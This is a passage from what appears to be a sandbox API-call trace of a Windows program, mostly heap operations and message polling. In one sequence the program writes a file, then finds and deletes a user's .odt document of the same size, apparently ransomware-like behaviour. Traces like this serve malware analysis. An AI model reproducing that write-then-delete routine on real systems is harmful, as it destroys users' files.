dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0179.114] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x6a9d, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x6a9d, lpOverlapped=0x0) returned 1 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.117] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.117] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.117] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.118] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.118] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0179.118] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.118] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0179.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.120] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.120] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.120] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", lpFilePart=0x0) returned 0x52 [0179.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x100926a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="hiVdX.odt", cAlternateFileName="")) returned 0x90ae18 [0179.122] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\hivdx.odt")) returned 1 [0179.139] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x100926a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="hiVdX.odt", cAlternateFileName="")) returned 0 [0179.139] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.139] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.140] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.140] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.140] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.159] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 1 [0179.159] TranslateMessage (lpMsg=0x87f194) returned 0 [0179.159] DispatchMessageW (lpMsg=0x87f194) returned 0x0 [0179.159] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e830) returned 1 [0179.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.160] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0179.160] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0179.160] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.160] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.162] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.162] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, 